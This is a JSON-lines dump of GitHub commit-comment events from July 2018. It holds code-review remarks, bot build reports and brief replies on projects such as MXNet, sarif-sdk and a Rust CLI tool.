{"id":"7911491659","type":"CommitCommentEvent","actor":{"login":"marcoabreu"},"repo":{"name":"apache/incubator-mxnet"},"payload":{"comment":{"id":29578151,"position":11,"line":536,"path":"ci/docker/runtime_functions.sh","commit_id":"29565659a2d31ba306bee3b3d5054f039799e195","created_at":"2018-07-03T09:54:11Z","updated_at":"2018-07-03T09:54:11Z","author_association":"CONTRIBUTOR","body":"We don't have to build the cpp package if we don't use it"}},"created_at":"2018-07-03T09:54:11Z"}
{"id":"7911494181","type":"CommitCommentEvent","actor":{"login":"IBRAHIMUAE"},"repo":{"name":"IBRAHIMUAE/my-travel-plans"},"payload":{"comment":{"id":29578161,"position":null,"line":null,"path":null,"commit_id":"413e310394707d5660853963a8b6fe5ddaef75f7","created_at":"2018-07-03T09:54:38Z","updated_at":"2018-07-03T09:54:38Z","author_association":"OWNER","body":"add animation"}},"created_at":"2018-07-03T09:54:38Z"}
{"id":"7911494532","type":"CommitCommentEvent","actor":{"login":"marcoabreu"},"repo":{"name":"apache/incubator-mxnet"},"payload":{"comment":{"id":29578163,"position":13,"line":538,"path":"ci/docker/runtime_functions.sh","commit_id":"29565659a2d31ba306bee3b3d5054f039799e195","created_at":"2018-07-03T09:54:41Z","updated_at":"2018-07-03T09:54:41Z","author_association":"CONTRIBUTOR","body":"Our default is to test without MKLDNN on CPU. Could you disable it?"}},"created_at":"2018-07-03T09:54:41Z"}
{"id":"7911494579","type":"CommitCommentEvent","actor":{"login":"kobake"},"repo":{"name":"sakura-editor/sakura"},"payload":{"comment":{"id":29578164,"position":56,"line":56,"path":"sakura_core/_os/ProcessPriority.h","commit_id":"9515cb9c4218a33ada395b2517e5c737d033ccd6","created_at":"2018-07-03T09:54:42Z","updated_at":"2018-07-03T09:54:42Z","author_association":"MEMBER","body":"> 最近流行のGoogle style\r\n\r\nリンク張っておきます。\r\nhttps://ttsuki.github.io/styleguide/cppguide.ja.html\r\n\r\n個人的にはファイル内で一貫されたルールが採られていればどっちでも良いです。\r\n\r\nどちらかというと namespace 部のインデントの取り方が気になりました（こういう書き方って見たことないです）。"}},"created_at":"2018-07-03T09:54:42Z"}
{"id":"7911498472","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"IlyaDvortsevoy/NET.S.2018.Dvortsevoy.03"},"payload":{"comment":{"id":29578172,"position":108,"line":108,"path":"CompareRealization/AlgorithmVariants.cs","commit_id":"6ba7cc4776c93ca5037d68d61dc1c93e71fba8cd","created_at":"2018-07-03T09:55:23Z","updated_at":"2018-07-03T09:55:23Z","author_association":"NONE","body":"- вроде уже писала про нецелесообразность этого метода"}},"created_at":"2018-07-03T09:55:23Z"}
{"id":"7911499447","type":"CommitCommentEvent","actor":{"login":"evansb"},"repo":{"name":"source-academy/cadet"},"payload":{"comment":{"id":29578176,"position":24,"line":29,"path":"terraform/cadet/inputs.tf","commit_id":"d2cb217e79917320c24b08ee3128cdaf39c94eeb","created_at":"2018-07-03T09:55:34Z","updated_at":"2018-07-03T09:55:34Z","author_association":"CONTRIBUTOR","body":"what you can do is simply change the password right after the database is created using AWS CLI and `provisioner` block, then store the password securely in encrypted form (using KMS). The API server then will need to download this password before startup.\r\n\r\nIf that's too overkill you can simply change the password manually using the AWS console afterwards.\r\nYou can also use something like https://console.aws.amazon.com/secretsmanager/home"}},"created_at":"2018-07-03T09:55:34Z"}
{"id":"7911507512","type":"CommitCommentEvent","actor":{"login":"Siaukovich"},"repo":{"name":"Siaukovich/NET.S.2018.Siaukovich.03"},"payload":{"comment":{"id":29578192,"position":32,"line":32,"path":"FindNthRoot/ApproximateMath.cs","commit_id":"3c442795c00ae5c36eb60deb0bc89c5f15b6ec72","created_at":"2018-07-03T09:57:02Z","updated_at":"2018-07-03T09:57:02Z","author_association":"OWNER","body":"Исправлено"}},"created_at":"2018-07-03T09:57:02Z"}
{"id":"7911508507","type":"CommitCommentEvent","actor":{"login":"Siaukovich"},"repo":{"name":"Siaukovich/NET.S.2018.Siaukovich.03"},"payload":{"comment":{"id":29578195,"position":61,"line":61,"path":"FindNthRoot/ApproximateMath.cs","commit_id":"3c442795c00ae5c36eb60deb0bc89c5f15b6ec72","created_at":"2018-07-03T09:57:13Z","updated_at":"2018-07-03T09:57:13Z","author_association":"OWNER","body":"Исправлено"}},"created_at":"2018-07-03T09:57:13Z"}
{"id":"7911509902","type":"CommitCommentEvent","actor":{"login":"xiulipan"},"repo":{"name":"thesofproject/soft"},"payload":{"comment":{"id":29578198,"position":null,"line":null,"path":null,"commit_id":"229da95e0d5a9d8abce89a5bb3804926b74d1ba0","created_at":"2018-07-03T09:57:29Z","updated_at":"2018-07-03T09:57:29Z","author_association":"CONTRIBUTOR","body":"@keyonjie \r\nThe soft #11 is need to change the cfg->num_hw_configs to not be 1 for ONE DAI.\r\nThe https://github.com/thesofproject/linux/issues/11 may need to refine if we want to have more config for one DAI."}},"created_at":"2018-07-03T09:57:29Z"}
{"id":"7911512352","type":"CommitCommentEvent","actor":{"login":"MikaelSvenn"},"repo":{"name":"MikaelSvenn/EMA"},"payload":{"comment":{"id":29578207,"position":5,"line":5,"path":"api/src/route/randomDelay.js","commit_id":"54dc99fee9f3d54bf2f8b7f25a2b05819fd8c4d5","created_at":"2018-07-03T09:57:57Z","updated_at":"2018-07-03T09:57:57Z","author_association":"OWNER","body":"Thank you for the review!\r\n\r\nYou are correct, and the remainder from the delayPrimitive also causes bias to the resulting delays. This might need to be revised and re-implemented in case this implementation leaks enough information to derive some of the key material."}},"created_at":"2018-07-03T09:57:57Z"}
{"id":"7911517853","type":"CommitCommentEvent","actor":{"login":"ramadv1"},"repo":{"name":"ramadv1/testinggit"},"payload":{"comment":{"id":29578214,"position":null,"line":null,"path":null,"commit_id":"19125ebd5312f70c4c77aefe5d3baad8bb34c3b0","created_at":"2018-07-03T09:58:58Z","updated_at":"2018-07-03T09:58:58Z","author_association":"OWNER","body":"Is this for me?\r\nVideo playlist recommended by Yves Muya-Benda helped me start exploring github quickly to decided whether it is for me!\r\nhttps://www.youtube.com/watch?v=BCQHnlnPusY"}},"created_at":"2018-07-03T09:58:58Z"}
{"id":"7911519598","type":"CommitCommentEvent","actor":{"login":"davidhm"},"repo":{"name":"mixxxdj/mixxx"},"payload":{"comment":{"id":29578217,"position":11,"line":11,"path":"src/broadcast/networkrequest.h","commit_id":"ba8a6fc86555f743c9280dbecb485576c9fa57ec","created_at":"2018-07-03T09:59:17Z","updated_at":"2018-07-03T09:59:17Z","author_association":"NONE","body":"What is? The default destructor or the class?"}},"created_at":"2018-07-03T09:59:17Z"}
{"id":"7915555187","type":"CommitCommentEvent","actor":{"login":"Fierthraix"},"repo":{"name":"Fierthraix/Loop"},"payload":{"comment":{"id":29588364,"position":1,"line":1,"path":"src/cli.yml","commit_id":"1d1c0b037306355fa5fa107e6ec8bf5b35e80f60","created_at":"2018-07-04T00:00:08Z","updated_at":"2018-07-04T00:00:08Z","author_association":"OWNER","body":"Command line options handled by structopt"}},"created_at":"2018-07-04T00:00:08Z"}
{"id":"7915556764","type":"CommitCommentEvent","actor":{"login":"Fierthraix"},"repo":{"name":"Fierthraix/Loop"},"payload":{"comment":{"id":29588375,"position":37,"line":32,"path":"src/main.rs","commit_id":"1d1c0b037306355fa5fa107e6ec8bf5b35e80f60","created_at":"2018-07-04T00:00:38Z","updated_at":"2018-07-04T00:00:38Z","author_association":"OWNER","body":"These variables are only used locally in the loop; there's no need to declare them here."}},"created_at":"2018-07-04T00:00:38Z"}
{"id":"7915558500","type":"CommitCommentEvent","actor":{"login":"Fierthraix"},"repo":{"name":"Fierthraix/Loop"},"payload":{"comment":{"id":29588379,"position":37,"line":32,"path":"src/main.rs","commit_id":"1d1c0b037306355fa5fa107e6ec8bf5b35e80f60","created_at":"2018-07-04T00:01:17Z","updated_at":"2018-07-04T00:01:17Z","author_association":"OWNER","body":"These variables only used locally in the loop below; there's no need to declare them here."}},"created_at":"2018-07-04T00:01:17Z"}
{"id":"7915558816","type":"CommitCommentEvent","actor":{"login":"ioquatix"},"repo":{"name":"socketry/async-rspec"},"payload":{"comment":{"id":29588382,"position":null,"line":null,"path":null,"commit_id":"66304548049e8e83c6ad0b609f8a5e21050289d5","created_at":"2018-07-04T00:01:24Z","updated_at":"2018-07-04T00:01:24Z","author_association":"MEMBER","body":"Thanks 👍 "}},"created_at":"2018-07-04T00:01:24Z"}
{"id":"7915560391","type":"CommitCommentEvent","actor":{"login":"Fierthraix"},"repo":{"name":"Fierthraix/Loop"},"payload":{"comment":{"id":29588386,"position":42,"line":37,"path":"src/main.rs","commit_id":"1d1c0b037306355fa5fa107e6ec8bf5b35e80f60","created_at":"2018-07-04T00:02:03Z","updated_at":"2018-07-04T00:02:03Z","author_association":"OWNER","body":"All parsing code is handled by structopt, these lines don't need to be in main"}},"created_at":"2018-07-04T00:02:03Z"}
{"id":"7915564656","type":"CommitCommentEvent","actor":{"login":"Fierthraix"},"repo":{"name":"Fierthraix/Loop"},"payload":{"comment":{"id":29588404,"position":164,"line":41,"path":"src/main.rs","commit_id":"1d1c0b037306355fa5fa107e6ec8bf5b35e80f60","created_at":"2018-07-04T00:03:48Z","updated_at":"2018-07-04T00:03:48Z","author_association":"OWNER","body":"All of the logic that determined `num` before is now made together in a single expression."}},"created_at":"2018-07-04T00:03:48Z"}
{"id":"7915565707","type":"CommitCommentEvent","actor":{"login":"tomfuller2"},"repo":{"name":"Joomla-Bible-Study/Joomla-Bible-Study"},"payload":{"comment":{"id":29588407,"position":null,"line":null,"path":null,"commit_id":"6dbc3d53af080d8cb25bd7d6cd8d3c1d68ed04be","created_at":"2018-07-04T00:04:18Z","updated_at":"2018-07-04T00:04:18Z","author_association":"MEMBER","body":"This issue was discovered by Zhouyuan Yang of Fortinet's FortiGuard Labs."}},"created_at":"2018-07-04T00:04:18Z"}
{"id":"7915566341","type":"CommitCommentEvent","actor":{"login":"AlexxEG"},"repo":{"name":"AlexxEG/BSA_Browser"},"payload":{"comment":{"id":29588410,"position":null,"line":null,"path":null,"commit_id":"f63db67f075d2de21311e13142bfbbc2aa37fb53","created_at":"2018-07-04T00:04:35Z","updated_at":"2018-07-04T00:04:35Z","author_association":"OWNER","body":"Bug introduced by 98eced015b8ec4b8ee86a87e24ab0dbf94a3a40b"}},"created_at":"2018-07-04T00:04:35Z"}
{"id":"7915568351","type":"CommitCommentEvent","actor":{"login":"Fierthraix"},"repo":{"name":"Fierthraix/Loop"},"payload":{"comment":{"id":29588416,"position":191,"line":61,"path":"src/main.rs","commit_id":"1d1c0b037306355fa5fa107e6ec8bf5b35e80f60","created_at":"2018-07-04T00:05:26Z","updated_at":"2018-07-04T00:05:26Z","author_association":"OWNER","body":"We use the `if let` syntax to explicitly announce that we don't care about the `None` case."}},"created_at":"2018-07-04T00:05:26Z"}
{"id":"7915568408","type":"CommitCommentEvent","actor":{"login":"kwabena2"},"repo":{"name":"kwabena2/Springboard"},"payload":{"comment":{"id":29588418,"position":null,"line":null,"path":null,"commit_id":"68b537ca214ba22c302a1663d160e440da53d83d","created_at":"2018-07-04T00:05:27Z","updated_at":"2018-07-04T00:05:27Z","author_association":"OWNER","body":"This is for springboard"}},"created_at":"2018-07-04T00:05:27Z"}
{"id":"7915568513","type":"CommitCommentEvent","actor":{"login":"lgolding"},"repo":{"name":"Microsoft/sarif-sdk"},"payload":{"comment":{"id":29588419,"position":141,"line":512,"path":"src/Sarif/Visitors/SarifCurrentToVersionOneVisitor.cs","commit_id":"be70b379ce921421487bded3d960d1a602c1bcd9","created_at":"2018-07-04T00:05:30Z","updated_at":"2018-07-04T00:05:30Z","author_association":"COLLABORATOR","body":"Bug: `sourceLine` is initialized to `null`, so the conditional test will always fail and you'll never read a line."}},"created_at":"2018-07-04T00:05:30Z"}
{"id":"7915571719","type":"CommitCommentEvent","actor":{"login":"rama64"},"repo":{"name":"carolina46/CIL-Grupo2"},"payload":{"comment":{"id":29588433,"position":null,"line":null,"path":null,"commit_id":"f7dde35077f27f26f9db07ecc2958bb130670f14","created_at":"2018-07-04T00:06:39Z","updated_at":"2018-07-04T00:06:39Z","author_association":"COLLABORATOR","body":"Ese print test mmm traten de no subirlo... osea acá ya fue, no pasa nada, pero en un laburo posta el consejo es no lo suban "}},"created_at":"2018-07-04T00:06:39Z"}
{"id":"7915572436","type":"CommitCommentEvent","actor":{"login":"kwabena2"},"repo":{"name":"kwabena2/Springboard"},"payload":{"comment":{"id":29588434,"position":1,"line":1,"path":"README.md","commit_id":"68b537ca214ba22c302a1663d160e440da53d83d","created_at":"2018-07-04T00:06:54Z","updated_at":"2018-07-04T00:06:54Z","author_association":"OWNER","body":"git init\r\ngit add\r\ngit commit"}},"created_at":"2018-07-04T00:06:54Z"}
{"id":"7915572966","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":29588435,"position":null,"line":null,"path":null,"commit_id":"f7309853ac516dbefaec608c3a339b1049fd2c4d","created_at":"2018-07-04T00:07:08Z","updated_at":"2018-07-04T00:07:08Z","author_association":"CONTRIBUTOR","body":"Hmm after reading the linked thread i'm not sure i understand. I'm\nbecoming more dumb\n\nBut this commit is just the prelude to something else.. see the\nattached petget.zip in the previous comment, unzip it in /usr/local in\na 32 bit pup and see for yourself.\n\nThe \"packages to install\" at the bottom will become the \"Pkg Info\",\nassuming i find the inspiration to continue with this since i don't\nreally think continuing is something reasonable. But it was just a\n\"proof of concept\" as i call it.\n\nOne thing is for sure, most of what zb does, i want to undo it, most\nof what bk does, i want to undo it. And basically most of the puppy\nstuff, i want to delete it.. This surely reflects a conflict of\ninterest...\n\nI can certainly revert this if you want..\n"}},"created_at":"2018-07-04T00:07:08Z"}
{"id":"7915577827","type":"CommitCommentEvent","actor":{"login":"Fierthraix"},"repo":{"name":"Fierthraix/Loop"},"payload":{"comment":{"id":29588458,"position":212,"line":78,"path":"src/main.rs","commit_id":"1d1c0b037306355fa5fa107e6ec8bf5b35e80f60","created_at":"2018-07-04T00:09:08Z","updated_at":"2018-07-04T00:09:08Z","author_association":"OWNER","body":"This case is one of many where accessing an `Option<T>` is used over having a separate `bool` and variable to denote a possible null value."}},"created_at":"2018-07-04T00:09:08Z"}
{"id":"7915580192","type":"CommitCommentEvent","actor":{"login":"GMaiolo"},"repo":{"name":"julietaflux/barplanning"},"payload":{"comment":{"id":29588462,"position":5,"line":103,"path":"web/js/index.js","commit_id":"e6d494186e7e55681a60a6af75f560f89b473110","created_at":"2018-07-04T00:10:09Z","updated_at":"2018-07-04T00:10:09Z","author_association":"COLLABORATOR","body":"NO"}},"created_at":"2018-07-04T00:10:09Z"}
{"id":"7915581445","type":"CommitCommentEvent","actor":{"login":"Fierthraix"},"repo":{"name":"Fierthraix/Loop"},"payload":{"comment":{"id":29588465,"position":234,"line":92,"path":"src/main.rs","commit_id":"1d1c0b037306355fa5fa107e6ec8bf5b35e80f60","created_at":"2018-07-04T00:10:37Z","updated_at":"2018-07-04T00:10:37Z","author_association":"OWNER","body":"The `ErrorCode` enum here encodes several `bool`s and their values, allowing a simple `match` statement instead nested `if` statements."}},"created_at":"2018-07-04T00:10:37Z"}
{"id":"7915584975","type":"CommitCommentEvent","actor":{"login":"Fierthraix"},"repo":{"name":"Fierthraix/Loop"},"payload":{"comment":{"id":29588481,"position":267,"line":221,"path":"src/main.rs","commit_id":"1d1c0b037306355fa5fa107e6ec8bf5b35e80f60","created_at":"2018-07-04T00:12:12Z","updated_at":"2018-07-04T00:12:12Z","author_association":"OWNER","body":"This part doesn't need to be in a loop. Instead of busy-waiting until the next iteration, just sleep the thread."}},"created_at":"2018-07-04T00:12:12Z"}
{"id":"7915585004","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29588482,"position":null,"line":null,"path":null,"commit_id":"15183b39c052da06bfd6ecae742e832f520324a5","created_at":"2018-07-04T00:12:12Z","updated_at":"2018-07-04T00:12:12Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T00:12:12Z"}
{"id":"7915588618","type":"CommitCommentEvent","actor":{"login":"treaclyor"},"repo":{"name":"DNUI-ACM/Task-to-here"},"payload":{"comment":{"id":29588487,"position":56,"line":56,"path":"vector任务/ljtvector.hpp","commit_id":"4a5d8d60a938769097c22cbd47ba768bbffcdc7c","created_at":"2018-07-04T00:13:44Z","updated_at":"2018-07-04T00:13:44Z","author_association":"CONTRIBUTOR","body":"if(i >= len || i < 0)\r\nreturn 0;"}},"created_at":"2018-07-04T00:13:44Z"}
{"id":"7915588927","type":"CommitCommentEvent","actor":{"login":"Fierthraix"},"repo":{"name":"Fierthraix/Loop"},"payload":{"comment":{"id":29588489,"position":317,"line":141,"path":"src/main.rs","commit_id":"1d1c0b037306355fa5fa107e6ec8bf5b35e80f60","created_at":"2018-07-04T00:13:52Z","updated_at":"2018-07-04T00:13:52Z","author_association":"OWNER","body":"Here is where we use structopt to serialize all of the command line options into a struct."}},"created_at":"2018-07-04T00:13:52Z"}
{"id":"7915590607","type":"CommitCommentEvent","actor":{"login":"Fierthraix"},"repo":{"name":"Fierthraix/Loop"},"payload":{"comment":{"id":29588493,"position":297,"line":128,"path":"src/main.rs","commit_id":"1d1c0b037306355fa5fa107e6ec8bf5b35e80f60","created_at":"2018-07-04T00:14:37Z","updated_at":"2018-07-04T00:14:37Z","author_association":"OWNER","body":"We can just check if `duration_since` succeeds, no need to match on the `Err` case."}},"created_at":"2018-07-04T00:14:37Z"}
{"id":"7915591231","type":"CommitCommentEvent","actor":{"login":"Fierthraix"},"repo":{"name":"Fierthraix/Loop"},"payload":{"comment":{"id":29588494,"position":312,"line":136,"path":"src/main.rs","commit_id":"1d1c0b037306355fa5fa107e6ec8bf5b35e80f60","created_at":"2018-07-04T00:14:53Z","updated_at":"2018-07-04T00:14:53Z","author_association":"OWNER","body":"Sleep instead of busy-waiting in a loop."}},"created_at":"2018-07-04T00:14:53Z"}
{"id":"7915591549","type":"CommitCommentEvent","actor":{"login":"mattkrick"},"repo":{"name":"ParabolInc/action"},"payload":{"comment":{"id":29588495,"position":null,"line":null,"path":null,"commit_id":"03966d813c0277df5663a4e80fd5e02f9455c284","created_at":"2018-07-04T00:15:01Z","updated_at":"2018-07-04T00:15:01Z","author_association":"MEMBER","body":"i like it! although i wouldn't waste any time on the legacy meeting format, it'll be cheaper to let that tech debt grow until moving to the new meeting becomes most important issue to address"}},"created_at":"2018-07-04T00:15:01Z"}
{"id":"7915591709","type":"CommitCommentEvent","actor":{"login":"lgolding"},"repo":{"name":"Microsoft/sarif-sdk"},"payload":{"comment":{"id":29588498,"position":145,"line":514,"path":"src/Sarif/Visitors/SarifCurrentToVersionOneVisitor.cs","commit_id":"be70b379ce921421487bded3d960d1a602c1bcd9","created_at":"2018-07-04T00:15:06Z","updated_at":"2018-07-04T00:15:06Z","author_association":"COLLABORATOR","body":"I think it's easier to do this as follows:\r\n1. Read the first `startLine -1` lines.\r\n2. Read the next `startColumn - 1` characters.\r\n... with appropriate checks for EOF.\r\n\r\nNo need to read past the column and then back up."}},"created_at":"2018-07-04T00:15:06Z"}
{"id":"7915594992","type":"CommitCommentEvent","actor":{"login":"paulhoadley"},"repo":{"name":"wocommunity/wonder"},"payload":{"comment":{"id":29588505,"position":null,"line":null,"path":null,"commit_id":"5af47fae17526fa5e53d56d5c7c281ba1761e85b","created_at":"2018-07-04T00:16:21Z","updated_at":"2018-07-04T00:16:21Z","author_association":"CONTRIBUTOR","body":"> It makes no sense to “clone” an immutable object by creating a new instance. Clone is only meaningful with a mutable object.\r\n\r\nWhether or not that's true (and Joshua Bloch certainly agrees that it's at least \"wasteful\"—\"Effective Java\", 3rd ed, Item 13), it's not _prohibited_ in any sense, in which case...\r\n\r\n> I guess you could call it an optimization.\r\n\r\nI think you could probably argue it's _broken._ Although `Cloneable`/`clone()` is an ugly area of Java (Bloch calls it \"fragile, dangerous and _extralinguistic_\"), the [Javadocs for `Object.clone()`](https://docs.oracle.com/javase/8/docs/api/java/lang/Object.html#clone--) do provide a \"general intent\" that, among other things:\r\n\r\n    x.clone() != x\r\n\r\nAn implementation of `clone()` that returns `this` would break that \"general intent\", though the docs also allow that \"The precise meaning of \"copy\" may depend on the class of the object\". Personally, I'd just steer well clear of the `clone()` method here."}},"created_at":"2018-07-04T00:16:21Z"}
{"id":"7915597008","type":"CommitCommentEvent","actor":{"login":"e-studio"},"repo":{"name":"Golochil/eleganzza360"},"payload":{"comment":{"id":29588508,"position":null,"line":null,"path":null,"commit_id":"2f0a2dd9174062a2a35229b5deefbcdea77e3428","created_at":"2018-07-04T00:17:16Z","updated_at":"2018-07-04T00:17:16Z","author_association":"NONE","body":"ta bien"}},"created_at":"2018-07-04T00:17:16Z"}
{"id":"7915598284","type":"CommitCommentEvent","actor":{"login":"kanitw"},"repo":{"name":"vega/vega-lite"},"payload":{"comment":{"id":29588510,"position":null,"line":null,"path":null,"commit_id":"fe1ff4f26615641fbf8dad6a9b353f566c6f75f1","created_at":"2018-07-04T00:17:50Z","updated_at":"2018-07-04T00:17:50Z","author_association":"MEMBER","body":"Shit -- do we have to go back and release 2.6.1 -- that's gonna be a pain..."}},"created_at":"2018-07-04T00:17:50Z"}
{"id":"7915598874","type":"CommitCommentEvent","actor":{"login":"Fierthraix"},"repo":{"name":"Fierthraix/Loop"},"payload":{"comment":{"id":29588511,"position":339,"line":163,"path":"src/main.rs","commit_id":"1d1c0b037306355fa5fa107e6ec8bf5b35e80f60","created_at":"2018-07-04T00:18:07Z","updated_at":"2018-07-04T00:18:07Z","author_association":"OWNER","body":"In the `parse` part of the proc macro we can specify the name of the function we want to handle the parsing. In this case it is `std::time::Duration::parse_duration`"}},"created_at":"2018-07-04T00:18:07Z"}
{"id":"7915601256","type":"CommitCommentEvent","actor":{"login":"Fierthraix"},"repo":{"name":"Fierthraix/Loop"},"payload":{"comment":{"id":29588519,"position":343,"line":167,"path":"src/main.rs","commit_id":"1d1c0b037306355fa5fa107e6ec8bf5b35e80f60","created_at":"2018-07-04T00:19:14Z","updated_at":"2018-07-04T00:19:14Z","author_association":"OWNER","body":"`get_values` is a custom parser declared below that converts a comma/space/newline separated list of items into a `Vec<String>`"}},"created_at":"2018-07-04T00:19:14Z"}
{"id":"7915602722","type":"CommitCommentEvent","actor":{"login":"lgolding"},"repo":{"name":"Microsoft/sarif-sdk"},"payload":{"comment":{"id":29588520,"position":226,"line":559,"path":"src/Sarif/Visitors/SarifCurrentToVersionOneVisitor.cs","commit_id":"be70b379ce921421487bded3d960d1a602c1bcd9","created_at":"2018-07-04T00:19:50Z","updated_at":"2018-07-04T00:19:50Z","author_association":"COLLABORATOR","body":"Bug: The code doesn't handle the case where the line is longer the endColumn (the usual case).\r\n```\r\nif (sourceLine != null)\r\n{\r\n    endColumn = sourceLine.Length >= v2Region.EndColumn\r\n        ? v2Region.EndColumn\r\n        : sourceLine.Length + 1;\r\n}\r\n```\r\n**NOTE** the \"+ 1\". If the line is 5 characters long, endColumn is 6 (because regions are \"half-open\" -- that is, they do _not_ include the character at the endColumn position."}},"created_at":"2018-07-04T00:19:50Z"}
{"id":"7915603137","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29588521,"position":null,"line":null,"path":null,"commit_id":"407962e55224e19958b6411943b35cec8a888b4a","created_at":"2018-07-04T00:20:01Z","updated_at":"2018-07-04T00:20:01Z","author_association":"NONE","body":"3982683-EIRFormulatedWWHP (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1684 of 1684 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-407962e55224e19958b6411943b35cec8a888b4a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-407962e55224e19958b6411943b35cec8a888b4a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-407962e55224e19958b6411943b35cec8a888b4a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.15%25-green.png)</a>\n"}},"created_at":"2018-07-04T00:20:01Z"}
{"id":"7915603175","type":"CommitCommentEvent","actor":{"login":"Fierthraix"},"repo":{"name":"Fierthraix/Loop"},"payload":{"comment":{"id":29588522,"position":355,"line":179,"path":"src/main.rs","commit_id":"1d1c0b037306355fa5fa107e6ec8bf5b35e80f60","created_at":"2018-07-04T00:20:03Z","updated_at":"2018-07-04T00:20:03Z","author_association":"OWNER","body":"This time out custom parser is doing the job of compiling our regex, an semi-expensive one-time operation that you don't want to do in a loop."}},"created_at":"2018-07-04T00:20:03Z"}
{"id":"7915606282","type":"CommitCommentEvent","actor":{"login":"Fierthraix"},"repo":{"name":"Fierthraix/Loop"},"payload":{"comment":{"id":29588525,"position":375,"line":199,"path":"src/main.rs","commit_id":"1d1c0b037306355fa5fa107e6ec8bf5b35e80f60","created_at":"2018-07-04T00:21:30Z","updated_at":"2018-07-04T00:21:30Z","author_association":"OWNER","body":"This enum is used to encode what kind of error code we want to watch for. `ErrorCode::Any` if obviously for any failure at all, and `ErrorCode::Code` for a specific code."}},"created_at":"2018-07-04T00:21:30Z"}
{"id":"7915606401","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29588526,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-04T00:21:33Z","updated_at":"2018-07-04T00:21:33Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T00:21:33Z"}
{"id":"7915606489","type":"CommitCommentEvent","actor":{"login":"lgolding"},"repo":{"name":"Microsoft/sarif-sdk"},"payload":{"comment":{"id":29588528,"position":263,"line":582,"path":"src/Sarif/Visitors/SarifCurrentToVersionOneVisitor.cs","commit_id":"be70b379ce921421487bded3d960d1a602c1bcd9","created_at":"2018-07-04T00:21:36Z","updated_at":"2018-07-04T00:21:36Z","author_association":"COLLABORATOR","body":"\"transcoded\""}},"created_at":"2018-07-04T00:21:36Z"}
{"id":"7915607483","type":"CommitCommentEvent","actor":{"login":"faceleg"},"repo":{"name":"lotto-nz/react-native-device-info"},"payload":{"comment":{"id":29588531,"position":4,"line":2,"path":"package.json","commit_id":"192039d1331f4c890f50254bc5df8e7255383079","created_at":"2018-07-04T00:22:05Z","updated_at":"2018-07-04T00:22:05Z","author_association":"NONE","body":"Approved"}},"created_at":"2018-07-04T00:22:05Z"}
{"id":"7915621770","type":"CommitCommentEvent","actor":{"login":"stevengj"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29588567,"position":28,"line":41,"path":"stdlib/Base64/src/Base64.jl","commit_id":"15a345bf74a27429bc4bb0c33b99a9151d65a735","created_at":"2018-07-04T00:28:30Z","updated_at":"2018-07-04T00:28:30Z","author_association":"MEMBER","body":"Yes"}},"created_at":"2018-07-04T00:28:30Z"}
{"id":"7915625314","type":"CommitCommentEvent","actor":{"login":"rcoup"},"repo":{"name":"geoserver/geoserver"},"payload":{"comment":{"id":29588575,"position":22,"line":20,"path":"src/main/src/main/java/org/geoserver/ows/ProxifyingURLMangler.java","commit_id":"3c05cfb84151fbcdf5bde6d4d42faa4d743673e9","created_at":"2018-07-04T00:30:10Z","updated_at":"2018-07-04T00:30:10Z","author_association":"CONTRIBUTOR","body":"Think this entry should be [`Forwarded`](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Forwarded) as per the ticket?"}},"created_at":"2018-07-04T00:30:10Z"}
